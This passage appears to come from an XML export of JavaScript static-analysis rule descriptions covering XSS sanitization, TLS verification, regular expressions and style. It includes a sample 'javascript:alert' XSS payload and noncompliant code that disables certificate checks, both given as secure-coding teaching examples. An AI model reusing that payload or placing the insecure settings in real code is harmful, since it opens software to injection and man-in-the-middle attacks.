    sanitize: true // Compliant
  })
};
console.log(kramed('Attack [xss?](javascript:alert("xss")).', options));
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md"&gt;OWASP Cheat
  Sheet&lt;/a&gt; - XSS Prevention Cheat Sheet &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)"&gt;OWASP Top 10 2017 Category A7&lt;/a&gt; - Cross-Site Scripting
  (XSS) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/79.html"&gt;MITRE, CWE-79&lt;/a&gt; - Improper Neutralization of Input During Web Page Generation
  ('Cross-site Scripting') &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/80.html"&gt;MITRE, CWE-80&lt;/a&gt; - Improper Neutralization of Script-Related HTML Tags in a Web Page
  (Basic XSS) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/83.html"&gt;MITRE, CWE-83&lt;/a&gt; - Improper Neutralization of Script in Attributes in a Web Page
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/84.html"&gt;MITRE, CWE-84&lt;/a&gt; - Improper Neutralization of Encoded URI Schemes in a Web Page &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4158</t>
  </si>
  <si>
    <t>Empty collections should not be accessed or iterated</t>
  </si>
  <si>
    <t>&lt;p&gt;When a collection is empty it makes no sense to access or iterate it. Doing so anyway is surely an error; either population was accidentally
omitted or the developer doesnâ€™t understand the situation.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let strings = [];
if (strings.includes("foo")) {}  // Noncompliant
for (str of strings) {}  // Noncompliant
strings.forEach(str =&amp;gt; doSomething(str)); // Noncompliant
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1440</t>
  </si>
  <si>
    <t>"===" and "!==" should be used instead of "==" and "!="</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt; operators do type coercion before comparing values. This is bad because it can mask type errors. For
example, it evaluates &lt;code&gt;' \t\r\n' == 0&lt;/code&gt; as &lt;code&gt;true&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;It is best to always use the side-effect-less &lt;code&gt;===&lt;/code&gt; and &lt;code&gt;!==&lt;/code&gt; operators instead.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (var == 'howdy') {...} // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (var === 'howdy') {...}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Even if testing the equality of a variable against null doesnâ€™t do exactly what most JavaScript developers believe, usage of &lt;code&gt;==&lt;/code&gt; or
&lt;code&gt;!=&lt;/code&gt; is tolerated in such context. In the following case, if &lt;code&gt;foo&lt;/code&gt; hasnâ€™t been initialized, its default value is not
&lt;code&gt;null&lt;/code&gt; but &lt;code&gt;undefined&lt;/code&gt;. Nevertheless &lt;code&gt;undefined == null&lt;/code&gt;, so JavaScript developers get the expected behavior.&lt;/p&gt;
&lt;pre&gt;
if(foo == null) {...}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3500</t>
  </si>
  <si>
    <t>Attempts should not be made to update "const" variables</t>
  </si>
  <si>
    <t>&lt;p&gt;Variables declared with &lt;code&gt;const&lt;/code&gt; cannot be modified. Unfortunately, attempts to do so donâ€™t always raise an error; in a non-ES2015
environment, such an attempt might simply be ignored.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const pi = "yes, please";
pi = 3.14;  // Noncompliant
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4830</t>
  </si>
  <si>
    <t>Server certificates should be verified during SSL/TLS connections</t>
  </si>
  <si>
    <t>&lt;p&gt;Validation of X.509 certificates is essential to create secure SSL/TLS sessions not vulnerable to man-in-the-middle attacks.&lt;/p&gt;
&lt;p&gt;The certificate chain validation includes these steps:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; The certificate is issued by its parent Certificate Authority or the root CA trusted by the system. &lt;/li&gt;
  &lt;li&gt; Each CA is allowed to issue certificates. &lt;/li&gt;
  &lt;li&gt; Each certificate in the chain is not expired. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Itâ€™s not recommended to reinvent the wheel by implementing custom certificate chain validation.&lt;/p&gt;
&lt;p&gt;TLS libraries provide built-in certificate validation functions that should be used.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;There is no way to disable certificate verification in tls, https and request modules but it is possible to not reject request when verification
fails.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/https.html"&gt;https&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method',
  rejectUnauthorized: false ; // Noncompliant
};
let req = https.request(options, (res) =&amp;gt; {
  res.on('data', (d) =&amp;gt; {
    process.stdout.write(d);
  });
}); // Noncompliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/tls.html"&gt;tls&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let options = {
    secureProtocol: 'TLSv1_2_method',
    rejectUnauthorized: false ; // Noncompliant
};
let socket = tls.connect(443, "www.example.com", options, () =&amp;gt; {
  process.stdin.pipe(socket);
  process.stdin.resume();
});  // Noncompliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/request"&gt;request&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let socket = request.get({
    url: 'www.example.com',
    secureProtocol: 'TLSv1_2_method',
    rejectUnauthorized: false ; // Noncompliant
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/https.html"&gt;https&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method'
};
let req = https.request(options, (res) =&amp;gt; {
  res.on('data', (d) =&amp;gt; {
    process.stdout.write(d);
  });
}); // Compliant: by default rejectUnauthorized  is set to true
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/tls.html"&gt;tls&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let options = {
    secureProtocol: 'TLSv1_2_method'
};
let socket = tls.connect(443, "www.example.com", options, () =&amp;gt; {
  process.stdin.pipe(socket);
  process.stdin.resume();
}); // Compliant: by default rejectUnauthorized  is set to true
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/request"&gt;request&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let socket = request.get({
    url: 'https://www.example.com/',
    secureProtocol: 'TLSv1_2_method' // Compliant
}); // Compliant: by default rejectUnauthorized  is set to true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href="https://cwe.mitre.org/data/definitions/295.html"&gt;MITRE, CWE-295&lt;/a&gt; - Improper Certificate Validation &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1439</t>
  </si>
  <si>
    <t>Only "while", "do", "for" and "switch" statements should be labelled</t>
  </si>
  <si>
    <t>&lt;p&gt;Any statement or block of statements can be identified by a label, but those labels should be used only on &lt;code&gt;while&lt;/code&gt;,
&lt;code&gt;do-while&lt;/code&gt;, &lt;code&gt;for&lt;/code&gt; and &lt;code&gt;switch&lt;/code&gt; statements. Using labels in any other context leads to unstructured, confusing
code.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
myLabel: if (i % 2 == 0) {  // Noncompliant
  if (i == 12) {
    console.log("12");
    break myLabel;
  }
  console.log("Odd number, but not 12");
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
myLabel: for (i = 0; i &amp;lt; 10; i++) {   // Compliant
  console.log("Loop");
  break myLabel;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1314</t>
  </si>
  <si>
    <t>Octal values should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Integer literals starting with a zero are octal rather than decimal values. While using octal values is fully supported, most developers do not
have experience with them. They may not recognize octal values as such, mistaking them instead for decimal values.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var myNumber = 010;   // Noncompliant. myNumber will hold 8, not 10 - was this really expected?
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var myNumber = 8;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3616</t>
  </si>
  <si>
    <t>Comma and logical OR operators should not be used in switch cases</t>
  </si>
  <si>
    <t>&lt;p&gt;The comma operator (&lt;code&gt;,&lt;/code&gt;) evaluates its operands, from left to right, and returns the second one. Thatâ€™s useful in some situations, but
just wrong in a &lt;code&gt;switch&lt;/code&gt; &lt;code&gt;case&lt;/code&gt;. You may think youâ€™re compactly handling multiple values in the case, but only the last one in
the comma-list will ever be handled. The rest will fall through to the default.&lt;/p&gt;
&lt;p&gt;Similarly the logical OR operator (&lt;code&gt;||&lt;/code&gt;) will not work in a &lt;code&gt;switch&lt;/code&gt; &lt;code&gt;case&lt;/code&gt;, only the first argument will be
considered at execution time.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
switch a {
  case 1,2:  // Noncompliant; only 2 is ever handled by this case
    doTheThing(a);
  case 3 || 4: // Noncompliant; only '3' is handled
    doThatThing(a);
  case 5:
    doTheOtherThing(a);
  default:
    console.log("Neener, neener!");  // this happens when a==1 or a == 4
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
switch a {
  case 1:
  case 2:
    doTheThing(a);
  case 3:
  case 4:
    doThatThing(a);
  case 5:
    doTheOtherThing(a);
  default:
    console.log("Neener, neener!");
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4823</t>
  </si>
  <si>
    <t>Using command line arguments is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Using command line arguments is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7281"&gt;CVE-2018-7281&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12326"&gt;CVE-2018-12326&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3198"&gt;CVE-2011-3198&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.&lt;/p&gt;
&lt;p&gt;Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus
passing sensitive information via command line arguments should be considered as insecure.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when on every program entry points (&lt;code&gt;main&lt;/code&gt; methods) when command line arguments are used. The goal is to guide
security code reviews.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; any of the command line arguments are used without being sanitized first. &lt;/li&gt;
  &lt;li&gt; your application accepts sensitive information via command line arguments. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you answered yes to any of these questions you are at risk.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet"&gt;Sanitize&lt;/a&gt; all command line arguments before using them.&lt;/p&gt;
&lt;p&gt;Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing
sensitive information to an application than exposing them in the command line. It is common to write them on the process' standard input, or give the
path to a file containing the information.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
// The process object is a global that provides information about, and control over, the current Node.js process
var param = process.argv[2]; // Sensitive: check how the argument is used
console.log('Param: ' + param);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A1-Injection"&gt;OWASP Top 10 2017 Category A1&lt;/a&gt; - Injection &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/88.html"&gt;MITRE, CWE-88&lt;/a&gt; - Argument Injection or Modification &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/214.html"&gt;MITRE, CWE-214&lt;/a&gt; - Information Exposure Through Process Environment &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat1"&gt;SANS Top 25&lt;/a&gt; - Insecure Interaction Between Components &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S6324</t>
  </si>
  <si>
    <t>Regular expressions should not contain control characters</t>
  </si>
  <si>
    <t>&lt;p&gt;Entries in the ASCII table below code 32 are known as control characters or non-printing characters. As they are not common in JavaScript strings,
using these invisible characters in regular expressions is most likely a mistake.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const pattern1 = /\x1a/;
const pattern2 = new RegExp('\x1a');
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const pattern1 = /\x20/;
const pattern2 = new RegExp('\x20');
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S6325</t>
  </si>
  <si>
    <t>Regular expression literals should be used when possible</t>
  </si>
  <si>
    <t>&lt;p&gt;Regular expression literals should be preferred over the &lt;code&gt;RegExp&lt;/code&gt; constructor calls when the pattern is a literal. Simply using a
regular expression literal is more concise and easier to read and does not require escaping like a string literal does.&lt;/p&gt;
&lt;p&gt;Using the &lt;code&gt;RegExp&lt;/code&gt; constructor is suitable when the pattern is computed dynamically, e.g. when it is provided by the user.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
new RegExp(/foo/);
new RegExp('bar');
new RegExp('baz', 'i');
new RegExp("\\d+");
new RegExp(`qux|quuz`);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
/foo/;
/bar/;
/baz/i;
/\d+/;
/qux|quuz/;
new RegExp(`Dear ${title},`);
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S6323</t>
  </si>
  <si>
    <t>Alternation in regular expressions should not contain empty alternatives</t>
  </si>
  <si>
    <t>&lt;p&gt;Alternation is used to match a single regular expression out of several possible regular expressions. If one of the alternatives is empty it would
match any input, which is most probably a mistake.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
/Jack|Peter|/.test('John'); // Noncompliant - returns 'true'
/Jack||Peter/.test('John'); // Noncompliant - returns 'true'
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
/Jack|Peter/.test('John'); // returns 'false'
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;One could use an empty alternation to make a regular expression group optional. Rule will not report on such cases.&lt;/p&gt;
&lt;pre&gt;
/mandatory(-optional|)/.test('mandatory'); // returns 'true'
/mandatory(-optional|)/.test('mandatory-optional'); // returns 'true'
&lt;/pre&gt;
&lt;p&gt;However, if there is a quantifier after the group the issue will be reported as using both &lt;code&gt;|&lt;/code&gt; and quantifier is redundant.&lt;/p&gt;
&lt;pre&gt;
/mandatory(-optional|)?/.test('mandatory'); // Noncompliant - using both `|` inside the group and `?` for the group.
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S6328</t>
  </si>
  <si>
    <t>Replacement strings should reference existing regular expression groups</t>
  </si>
  <si>
    <t>&lt;p&gt;If the first parameter of &lt;code&gt;String.replace&lt;/code&gt; is a regular expression, a special syntax can be used in the replacement string to reference
capturing groups. Use &lt;code&gt;$n&lt;/code&gt; to reference the group by number and &lt;code&gt;$&amp;lt;Name&amp;gt;&lt;/code&gt; to reference the group by name. Because
replacements strings in &lt;code&gt;String.replace&lt;/code&gt; are interpreted at runtime, nothing prevents you to reference nonexisting group, with nonexisting
index or bad name, then the resulting string will be wrong. This rule statically validates that all referenced groups exist when replacing with
&lt;code&gt;String.replace&lt;/code&gt; or &lt;code&gt;String.replaceAll&lt;/code&gt; methods.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const str = 'James Bond';
console.log(str.replace(/(\w+)\s(\w+)/, '$1, $0 $1')); // Noncompliant, index is 1-based, '$0' does not exist, prints 'James, $0 James'
console.log(str.replace(/(?&amp;lt;firstName&amp;gt;\w+)\s(?&amp;lt;lastName&amp;gt;\w+)/, '$&amp;lt;surname&amp;gt;, $&amp;lt;firstName&amp;gt; $&amp;lt;surname&amp;gt;')); // Noncompliant &amp;nbsp;'$&amp;lt;surname&amp;gt;' does not exist, prints ', James '
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const str = 'James Bond';
console.log(str.replace(/(\w+)\s(\w+)/, '$2, $1 $2'));
console.log(str.replace(/(?&amp;lt;firstName&amp;gt;\w+)\s(?&amp;lt;lastName&amp;gt;\w+)/, '$&amp;lt;lastName&amp;gt;, $&amp;lt;firstName&amp;gt; $&amp;lt;lastName&amp;gt;'));
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4822</t>
  </si>
  <si>
    <t>Promise rejections should not be caught by 'try' block</t>
  </si>
  <si>
    <t>&lt;p&gt;An exception (including &lt;code&gt;reject&lt;/code&gt;) thrown by a promise will not be caught by a nesting &lt;code&gt;try&lt;/code&gt; block, due to the asynchronous
nature of execution. Instead, use &lt;code&gt;catch&lt;/code&gt; method of &lt;code&gt;Promise&lt;/code&gt; or wrap it inside &lt;code&gt;await&lt;/code&gt; expression.&lt;/p&gt;
&lt;p&gt;This rule reports &lt;code&gt;try-catch&lt;/code&gt; statements containing nothing else but call(s) to a function returning a &lt;code&gt;Promise&lt;/code&gt; (thus itâ€™s
less likely that &lt;code&gt;catch&lt;/code&gt; is intended to catch something else than &lt;code&gt;Promise&lt;/code&gt; rejection).&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function runPromise() {
  return Promise.reject("rejection reason");
}
function foo() {
  try { // Noncompliant, the catch clause of the 'try' will not be executed for the code inside promise
    runPromise();
  } catch (e) {
    console.log("Failed to run promise", e);
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function foo() {
  runPromise().catch(e =&amp;gt; console.log("Failed to run promise", e));
}
// or
async function foo() {
  try {
    await runPromise();
  } catch (e) {
    console.log("Failed to run promise", e);
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S6326</t>
  </si>
  <si>
    <t>Regular expressions should not contain multiple spaces</t>
  </si>
  <si>
    <t>&lt;p&gt;Multiple spaces in a regular expression can make it hard to tell how many spaces should be matched. Itâ€™s more readable to use only one space and
then indicate with a quantifier how many spaces are expected.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const pattern = /Hello,   world!/;
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const pattern = /Hello, {3}world!/;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1313</t>
  </si>
  <si>
    <t>Using hardcoded IP addresses is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5901"&gt;CVE-2006-5901&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3725"&gt;CVE-2005-3725&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Todayâ€™s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always
have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development,
delivery, and deployment:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file. &lt;/li&gt;
  &lt;li&gt; It misleads to use the same address in every environment (dev, sys, qa, prod). &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially
sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to
bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which
will increase an attackâ€™s impact.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;p&gt;The disclosed IP address is sensitive, e.g.:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; Can give information to an attacker about the network topology. &lt;/li&gt;
  &lt;li&gt; Itâ€™s a personal (assigned to an identifiable person) IP address. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of these questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Donâ€™t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar
approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having
to rebuild the software.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
ip = "192.168.12.42"; // Sensitive
const net = require('net');
var client = new net.Socket();
client.connect(80, ip, function() {
  // ...
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
ip = process.env.IP_ADDRESS; // Compliant
const net = require('net');
var client = new net.Socket();
client.connect(80, ip, function() {
  // ...
});
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;No issue is reported for the following cases because they are not considered sensitive:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255) &lt;/li&gt;
  &lt;li&gt; Broadcast address 255.255.255.255 &lt;/li&gt;
  &lt;li&gt; Non routable address 0.0.0.0 &lt;/li&gt;
  &lt;li&gt; Strings of the form &lt;code&gt;2.5.&amp;lt;number&amp;gt;.&amp;lt;number&amp;gt;&lt;/code&gt; as they &lt;a href="http://www.oid-info.com/introduction.htm"&gt;often match
  Object Identifiers&lt;/a&gt; (OID). &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S6353</t>
  </si>
  <si>
    <t>Regular expression quantifiers and character classes should be used concisely</t>
  </si>
  <si>
    <t>&lt;p&gt;With regular expressions syntax, itâ€™s possible to express the same thing in many ways. For example, to match a two-digit number, one could write
&lt;code&gt;[0-9]{2,2}&lt;/code&gt; or &lt;code&gt;\d{2}&lt;/code&gt;. Latter is not only shorter in terms of expression length, but also easier to read and thus to maintain.
This rule recommends to replace some bulky quantifiers and character classes with more concise equivalents:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;code&gt;\d&lt;/code&gt; for &lt;code&gt;[0-9]&lt;/code&gt; and &lt;code&gt;\D&lt;/code&gt; for &lt;code&gt;[^0-9]&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;\w&lt;/code&gt; for &lt;code&gt;[A-Za-z0-9_]&lt;/code&gt; and &lt;code&gt;\W&lt;/code&gt; for &lt;code&gt;[^A-Za-z0-9_]&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;.&lt;/code&gt; for character classes matching everything (e.g. &lt;code&gt;[\w\W]&lt;/code&gt;, &lt;code&gt;[\d\D]&lt;/code&gt;, or &lt;code&gt;[\s\S]&lt;/code&gt; with
  &lt;code&gt;s&lt;/code&gt; flag) &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;x?&lt;/code&gt; for &lt;code&gt;x{0,1}&lt;/code&gt;, &lt;code&gt;x*&lt;/code&gt; for &lt;code&gt;x{0,}&lt;/code&gt;, &lt;code&gt;x+&lt;/code&gt; for &lt;code&gt;x{1,}&lt;/code&gt;, &lt;code&gt;x{N}&lt;/code&gt; for
  &lt;code&gt;x{N,N}&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
/a{1,}/; // Noncompliant, '{1,}' quantifier is the same as '+'
/[A-Za-z0-9_]/; // Noncompliant, '\w' is equivalent
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
/a+/;
/\w/;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S6351</t>
  </si>
  <si>
    <t>Regular expressions with the global flag should be used with caution</t>
  </si>
  <si>
    <t>&lt;p&gt;Regular expressions with the global flag turned on can be a source of tricky bugs for uninformed users, and should therefore be used with caution.
Such regular expressions are stateful, that is, they maintain an internal state through the &lt;code&gt;lastIndex&lt;/code&gt; property, which is updated and used
as starting point on every call to &lt;code&gt;RegExp.prototype.test()&lt;/code&gt; and &lt;code&gt;RegExp.prototype.exec()&lt;/code&gt;, even when testing a different
string. The &lt;code&gt;lastIndex&lt;/code&gt; property is eventually reset when these functions return &lt;code&gt;false&lt;/code&gt; and &lt;code&gt;null&lt;/code&gt; respectively.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; a regular expression is tested against different inputs with &lt;code&gt;RegExp.prototype.test()&lt;/code&gt; or &lt;code&gt;RegExp.prototype.exec()&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; a regular expression is defined within a loop condition while used with &lt;code&gt;RegExp.prototype.exec()&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; a regular expression turns on both global &lt;code&gt;g&lt;/code&gt; and sticky &lt;code&gt;y&lt;/code&gt; flags &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const datePattern = /\d{4}-\d{2}-\d{2}/g;
datePattern.test('2020-08-06');
datePattern.test('2019-10-10'); // Noncompliant: the regex will return "false" despite the date being well-formed
const str = 'foodie fooled football';
while ((result = /foo*/g.exec(str)) !== null) { // Noncompliant: a regex is defined at each iteration causing an infinite loop
  /* ... */
}
const stickyPattern = /abc/gy; // Noncompliant: a regex defined as both sticky and global ignores the global flag
stickyPattern.test(/* ... */);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const datePattern = /\d{4}-\d{2}-\d{2}/;
datePattern.test('2020-08-06');
datePattern.test('2019-10-10'); // Compliant
const reg = /foo*/g;
const str = 'foodie fooled football';
while ((result = reg.exec(str)) !== null) { // Compliant
  /* ... */
}
const stickyPattern = /abc/y; // Compliant
stickyPattern.test(/* ... */);
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1105</t>
  </si>
  <si>
    <t>An open curly brace should be located at the end of a line</t>
  </si>
  <si>
    <t>&lt;p&gt;Shared naming conventions allow teams to collaborate effectively. This rule raises an issue when the brace-style is not respecting the convention
setup in parameter:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://en.wikipedia.org/wiki/Indentation_style#K&amp;amp;R_style"&gt;1tbs&lt;/a&gt; (default) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://en.wikipedia.org/wiki/Indentation_style#Allman_style"&gt;allman&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://en.wikipedia.org/wiki/Indentation_style#Variant:_Stroustrup"&gt;stroustrup&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;Using the parameter default (1tbs):&lt;/p&gt;
&lt;pre&gt;
if (condition)
{                                                      //Noncompliant
  doSomething();
}                                                      //Noncompliant
else {
  doSomethingElse();
}
